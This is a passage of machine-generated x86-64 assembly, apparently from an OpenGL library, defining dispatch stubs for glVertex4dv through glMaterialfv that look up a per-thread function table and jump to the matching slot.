	.size GL_PREFIX(Vertex4d), .-GL_PREFIX(Vertex4d)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex4dv)
	.type GL_PREFIX(Vertex4dv), @function
/* glVertex4dv: jump through dispatch-table slot 143 (byte offset 1144). */
GL_PREFIX(Vertex4dv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1144(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the pointer argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1144(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1144(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1144(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex4dv), .-GL_PREFIX(Vertex4dv)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex4f)
	.type GL_PREFIX(Vertex4f), @function
/* glVertex4f: jump through dispatch-table slot 144 (byte offset 1152).
 * Four float args in %xmm0-%xmm3 are spilled around the lookup call. */
GL_PREFIX(Vertex4f):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1152(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $40, %rsp	/* 32 bytes of spill + 8 pad keeps %rsp 16-aligned */
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	movq %xmm3, 24(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 24(%rsp), %xmm3
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $40, %rsp
	movq 1152(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1152(%rax), %r11
	jmp *%r11
1:
	subq $40, %rsp
	movq %xmm0, (%rsp)
	movq %xmm1, 8(%rsp)
	movq %xmm2, 16(%rsp)
	movq %xmm3, 24(%rsp)
	call _glapi_get_dispatch
	movq 24(%rsp), %xmm3
	movq 16(%rsp), %xmm2
	movq 8(%rsp), %xmm1
	movq (%rsp), %xmm0
	addq $40, %rsp
	movq 1152(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex4f), .-GL_PREFIX(Vertex4f)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex4fv)
	.type GL_PREFIX(Vertex4fv), @function
/* glVertex4fv: jump through dispatch-table slot 145 (byte offset 1160). */
GL_PREFIX(Vertex4fv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1160(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the pointer argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1160(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1160(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1160(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex4fv), .-GL_PREFIX(Vertex4fv)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex4i)
	.type GL_PREFIX(Vertex4i), @function
/* glVertex4i: jump through dispatch-table slot 146 (byte offset 1168). */
GL_PREFIX(Vertex4i):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1168(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the four integer argument registers */
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1168(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1168(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1168(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex4i), .-GL_PREFIX(Vertex4i)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex4iv)
	.type GL_PREFIX(Vertex4iv), @function
/* glVertex4iv: jump through dispatch-table slot 147 (byte offset 1176). */
GL_PREFIX(Vertex4iv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1176(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the pointer argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1176(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1176(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1176(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex4iv), .-GL_PREFIX(Vertex4iv)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex4s)
	.type GL_PREFIX(Vertex4s), @function
/* glVertex4s: jump through dispatch-table slot 148 (byte offset 1184). */
GL_PREFIX(Vertex4s):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1184(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the four integer argument registers */
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1184(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1184(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1184(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex4s), .-GL_PREFIX(Vertex4s)
	.p2align 4,,15
	.globl GL_PREFIX(Vertex4sv)
	.type GL_PREFIX(Vertex4sv), @function
/* glVertex4sv: jump through dispatch-table slot 149 (byte offset 1192). */
GL_PREFIX(Vertex4sv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1192(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the pointer argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1192(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1192(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1192(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Vertex4sv), .-GL_PREFIX(Vertex4sv)
	.p2align 4,,15
	.globl GL_PREFIX(ClipPlane)
	.type GL_PREFIX(ClipPlane), @function
/* glClipPlane: jump through dispatch-table slot 150 (byte offset 1200). */
GL_PREFIX(ClipPlane):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1200(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1200(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1200(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1200(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(ClipPlane), .-GL_PREFIX(ClipPlane)
	.p2align 4,,15
	.globl GL_PREFIX(ColorMaterial)
	.type GL_PREFIX(ColorMaterial), @function
/* glColorMaterial: jump through dispatch-table slot 151 (byte offset 1208). */
GL_PREFIX(ColorMaterial):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1208(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1208(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1208(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1208(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(ColorMaterial), .-GL_PREFIX(ColorMaterial)
	.p2align 4,,15
	.globl GL_PREFIX(CullFace)
	.type GL_PREFIX(CullFace), @function
/* glCullFace: jump through dispatch-table slot 152 (byte offset 1216). */
GL_PREFIX(CullFace):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1216(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the single argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1216(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1216(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1216(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(CullFace), .-GL_PREFIX(CullFace)
	.p2align 4,,15
	.globl GL_PREFIX(Fogf)
	.type GL_PREFIX(Fogf), @function
/* glFogf: jump through dispatch-table slot 153 (byte offset 1224).
 * One integer arg (%rdi) plus one float arg (%xmm0) are spilled around
 * the dispatch-lookup call. */
GL_PREFIX(Fogf):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1224(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp	/* 16 bytes of spill + 8 pad keeps %rsp 16-aligned */
	movq %rdi, (%rsp)
	movq %xmm0, 8(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 8(%rsp), %xmm0
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1224(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1224(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %rdi, (%rsp)
	movq %xmm0, 8(%rsp)
	call _glapi_get_dispatch
	movq 8(%rsp), %xmm0
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1224(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Fogf), .-GL_PREFIX(Fogf)
	.p2align 4,,15
	.globl GL_PREFIX(Fogfv)
	.type GL_PREFIX(Fogfv), @function
/* glFogfv: jump through dispatch-table slot 154 (byte offset 1232). */
GL_PREFIX(Fogfv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1232(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1232(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1232(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1232(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Fogfv), .-GL_PREFIX(Fogfv)
	.p2align 4,,15
	.globl GL_PREFIX(Fogi)
	.type GL_PREFIX(Fogi), @function
/* glFogi: jump through dispatch-table slot 155 (byte offset 1240). */
GL_PREFIX(Fogi):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1240(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1240(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1240(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1240(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Fogi), .-GL_PREFIX(Fogi)
	.p2align 4,,15
	.globl GL_PREFIX(Fogiv)
	.type GL_PREFIX(Fogiv), @function
/* glFogiv: jump through dispatch-table slot 156 (byte offset 1248). */
GL_PREFIX(Fogiv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1248(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1248(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1248(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1248(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Fogiv), .-GL_PREFIX(Fogiv)
	.p2align 4,,15
	.globl GL_PREFIX(FrontFace)
	.type GL_PREFIX(FrontFace), @function
/* glFrontFace: jump through dispatch-table slot 157 (byte offset 1256). */
GL_PREFIX(FrontFace):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1256(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the single argument across the call */
	call _x86_64_get_dispatch@PLT
	popq %rdi
	movq 1256(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1256(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	call _glapi_get_dispatch
	popq %rdi
	movq 1256(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(FrontFace), .-GL_PREFIX(FrontFace)
	.p2align 4,,15
	.globl GL_PREFIX(Hint)
	.type GL_PREFIX(Hint), @function
/* glHint: jump through dispatch-table slot 158 (byte offset 1264). */
GL_PREFIX(Hint):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1264(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1264(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1264(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1264(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Hint), .-GL_PREFIX(Hint)
	.p2align 4,,15
	.globl GL_PREFIX(Lightf)
	.type GL_PREFIX(Lightf), @function
/* glLightf: jump through dispatch-table slot 159 (byte offset 1272).
 * Two integer args (%rdi, %rsi) and one float arg (%xmm0) are spilled
 * around the dispatch-lookup call. */
GL_PREFIX(Lightf):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1272(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp	/* spill area; also keeps %rsp 16-byte aligned */
	movq %rdi, (%rsp)
	movq %rsi, 8(%rsp)
	movq %xmm0, 16(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 16(%rsp), %xmm0
	movq 8(%rsp), %rsi
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1272(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1272(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %rdi, (%rsp)
	movq %rsi, 8(%rsp)
	movq %xmm0, 16(%rsp)
	call _glapi_get_dispatch
	movq 16(%rsp), %xmm0
	movq 8(%rsp), %rsi
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1272(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Lightf), .-GL_PREFIX(Lightf)
	.p2align 4,,15
	.globl GL_PREFIX(Lightfv)
	.type GL_PREFIX(Lightfv), @function
/* glLightfv: jump through dispatch-table slot 160 (byte offset 1280). */
GL_PREFIX(Lightfv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1280(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1280(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1280(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1280(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Lightfv), .-GL_PREFIX(Lightfv)
	.p2align 4,,15
	.globl GL_PREFIX(Lighti)
	.type GL_PREFIX(Lighti), @function
/* glLighti: jump through dispatch-table slot 161 (byte offset 1288). */
GL_PREFIX(Lighti):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1288(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1288(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1288(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1288(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Lighti), .-GL_PREFIX(Lighti)
	.p2align 4,,15
	.globl GL_PREFIX(Lightiv)
	.type GL_PREFIX(Lightiv), @function
/* glLightiv: jump through dispatch-table slot 162 (byte offset 1296). */
GL_PREFIX(Lightiv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1296(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the three argument registers */
	pushq %rsi
	pushq %rdx	/* 3 pushes also keep %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1296(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1296(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1296(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Lightiv), .-GL_PREFIX(Lightiv)
	.p2align 4,,15
	.globl GL_PREFIX(LightModelf)
	.type GL_PREFIX(LightModelf), @function
/* glLightModelf: jump through dispatch-table slot 163 (byte offset 1304).
 * One integer arg (%rdi) and one float arg (%xmm0) are spilled around
 * the dispatch-lookup call. */
GL_PREFIX(LightModelf):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1304(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp	/* spill area; also keeps %rsp 16-byte aligned */
	movq %rdi, (%rsp)
	movq %xmm0, 8(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 8(%rsp), %xmm0
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1304(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1304(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %rdi, (%rsp)
	movq %xmm0, 8(%rsp)
	call _glapi_get_dispatch
	movq 8(%rsp), %xmm0
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1304(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(LightModelf), .-GL_PREFIX(LightModelf)
	.p2align 4,,15
	.globl GL_PREFIX(LightModelfv)
	.type GL_PREFIX(LightModelfv), @function
/* glLightModelfv: jump through dispatch-table slot 164 (byte offset 1312). */
GL_PREFIX(LightModelfv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1312(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1312(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1312(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1312(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(LightModelfv), .-GL_PREFIX(LightModelfv)
	.p2align 4,,15
	.globl GL_PREFIX(LightModeli)
	.type GL_PREFIX(LightModeli), @function
/* glLightModeli: jump through dispatch-table slot 165 (byte offset 1320). */
GL_PREFIX(LightModeli):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1320(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1320(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1320(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1320(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(LightModeli), .-GL_PREFIX(LightModeli)
	.p2align 4,,15
	.globl GL_PREFIX(LightModeliv)
	.type GL_PREFIX(LightModeliv), @function
/* glLightModeliv: jump through dispatch-table slot 166 (byte offset 1328). */
GL_PREFIX(LightModeliv):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1328(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1328(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1328(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1328(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(LightModeliv), .-GL_PREFIX(LightModeliv)
	.p2align 4,,15
	.globl GL_PREFIX(LineStipple)
	.type GL_PREFIX(LineStipple), @function
/* glLineStipple: jump through dispatch-table slot 167 (byte offset 1336). */
GL_PREFIX(LineStipple):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1336(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	pushq %rdi	/* save the two argument registers */
	pushq %rsi
	pushq %rbp	/* pad push: keeps %rsp 16-byte aligned at the call */
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1336(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1336(%rax), %r11
	jmp *%r11
1:
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1336(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(LineStipple), .-GL_PREFIX(LineStipple)
	.p2align 4,,15
	.globl GL_PREFIX(LineWidth)
	.type GL_PREFIX(LineWidth), @function
/* glLineWidth: jump through dispatch-table slot 168 (byte offset 1344).
 * The single float arg (%xmm0) is spilled around the lookup call. */
GL_PREFIX(LineWidth):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1344(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $8, %rsp	/* one 8-byte spill slot; keeps %rsp 16-aligned */
	movq %xmm0, (%rsp)
	call _x86_64_get_dispatch@PLT
	movq (%rsp), %xmm0
	addq $8, %rsp
	movq 1344(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1344(%rax), %r11
	jmp *%r11
1:
	subq $8, %rsp
	movq %xmm0, (%rsp)
	call _glapi_get_dispatch
	movq (%rsp), %xmm0
	addq $8, %rsp
	movq 1344(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(LineWidth), .-GL_PREFIX(LineWidth)
	.p2align 4,,15
	.globl GL_PREFIX(Materialf)
	.type GL_PREFIX(Materialf), @function
/* glMaterialf: jump through dispatch-table slot 169 (byte offset 1352).
 * Two integer args (%rdi, %rsi) and one float arg (%xmm0) are spilled
 * around the dispatch-lookup call. */
GL_PREFIX(Materialf):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1352(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	subq $24, %rsp	/* spill area; also keeps %rsp 16-byte aligned */
	movq %rdi, (%rsp)
	movq %rsi, 8(%rsp)
	movq %xmm0, 16(%rsp)
	call _x86_64_get_dispatch@PLT
	movq 16(%rsp), %xmm0
	movq 8(%rsp), %rsi
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1352(%rax), %r11
	jmp *%r11
#else
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f	/* table not initialized yet */
	movq 1352(%rax), %r11
	jmp *%r11
1:
	subq $24, %rsp
	movq %rdi, (%rsp)
	movq %rsi, 8(%rsp)
	movq %xmm0, 16(%rsp)
	call _glapi_get_dispatch
	movq 16(%rsp), %xmm0
	movq 8(%rsp), %rsi
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1352(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(Materialf), .-GL_PREFIX(Materialf)
	.p2align 4,,15
	.globl GL_PREFIX(Materialfv)
	.type GL_PREFIX(Materialfv), @function
/* glMaterialfv: jump through dispatch-table slot 170 (byte offset 1360). */
GL_PREFIX(Materialfv):
#if defined(GLX_USE_TLS)
